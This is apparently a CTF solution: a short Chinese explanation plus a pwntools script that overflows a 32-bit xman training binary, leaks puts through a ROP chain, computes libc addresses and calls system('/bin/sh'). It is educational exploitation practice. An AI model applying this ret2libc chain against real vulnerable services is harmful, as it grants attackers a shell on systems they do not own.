坑：libc.search() 里搜索的字符串必须是 `/bin/sh`（带前导斜杠），不能写成 `bin/sh`——后者匹配到的是同一字符串偏移 1 处的相对路径，system() 无法按相对路径执行，拿不到 shell。
这道题的思路：先利用第一次溢出让游戏流程走到 finger 函数；然后在 finger 的溢出点劫持返回地址，构造 puts@plt + finger（作为 puts 的返回地址，让程序继续存活）+ puts@got（作为 puts 的参数）的栈布局，把 puts 在 libc 中的真实地址打印出来；再借助题目给出的远端 libc（libc-2.19.so）计算 puts 与 system、"/bin/sh" 字符串之间的偏移，得到 system 和 "/bin/sh" 的真实地址；最后用同样的栈布局把 puts@plt 换成 system、参数换成 "/bin/sh"，拿到 shell。
from pwn import *
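# Target binary from the xman CTF training camp. The addresses below are
# fixed (hard-coded, i.e. the binary is assumed non-PIE) 32-bit addresses
# taken from the challenge binary; the libc offsets come from the libc shipped
# with the challenge.
io = process("./2419")

# puts@got.plt: leaking its contents gives the runtime address of puts in libc.
puts_got = 0x0804A01C
# puts@plt: the call stub placed as the hijacked return address in the first
# ROP chain so that the GOT entry above gets printed.
puts_plt = 0x08048490
# Address of the challenge's `finger` function; used as the return address
# after each hijacked call so execution stays alive for a second payload.
finger = 0x08048765
# libc provided with the challenge; puts/system/"/bin/sh" offsets are read
# from it and added to the leaked base.
libc = ELF('./libc-2.19.so')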
def readuntil(delim):
    """Receive from the global `io` tube up to and including `delim`.

    Thin wrapper around `io.recvuntil`; returns exactly what it returns
    (the received data, delimiter included).
    """
    return io.recvuntil(delim)
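# --- Stage 0: consume the banner line ------------------------------------
print(readuntil(b'\n'))

# --- Stage 1: first overflow, steer the game flow towards `finger` --------
# 'campmates' + 81 filler bytes + 'good' is the input the challenge's first
# check presumably expects before the flow reaches finger — verify the
# offsets against the binary if the target changes.
payload1 = b'campmates' + b'A' * 81 + b'good'
print(payload1)
io.sendline(payload1)
readuntil(b'cloth')
readuntil(b'\n')

# --- Stage 2: leak puts' libc address through puts@plt --------------------
# Stack layout at finger's overflow: 25 bytes up to the saved return
# address, then puts@plt as the new return address, `finger` as puts' own
# return address (keeps the program alive for a second round), and
# puts@got as puts' single argument.
payload2 = b'A' * 25 + p32(puts_plt) + p32(finger) + p32(puts_got)
io.sendline(payload2)
leak = readuntil(b'\n')
print(b'plt:' + leak)
if len(leak) < 8:
    raise RuntimeError('leak too short (%d bytes); did the ROP chain run?' % len(leak))
# The libc address of puts sits at bytes 4..7 of the leaked line (the first
# four bytes are other target output — check the printed line if in doubt).
puts_addr = u32(leak[4:8])
print(hex(puts_addr))

# Sanity check: ASLR only moves libc by whole pages, so the low 12 bits of
# the leaked puts must equal those of puts in libc-2.19.so. A mismatch means
# the slice offset or the libc version is wrong; stop here instead of
# sending a garbage system address to the target.
if (puts_addr & 0xfff) != (libc.symbols['puts'] & 0xfff):
    raise RuntimeError('puts leak 0x%x does not match libc-2.19.so page offset' % puts_addr)

# Compute the libc load base once and derive everything else from it.
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
print(hex(system_addr))
# Must be "/bin/sh" with the leading slash: searching for "bin/sh" matches
# one byte into the same string and yields a relative path system cannot run.
bin_addr = libc_base + next(libc.search(b'/bin/sh'))
print(hex(bin_addr))

# --- Stage 3: same layout as stage 2, but call system("/bin/sh") ----------
print(readuntil(b'cloth'))
readuntil(b'\n')
payload3 = b'A' * 25 + p32(system_addr) + p32(finger) + p32(bin_addr)
io.sendline(payload3)
io.interactive()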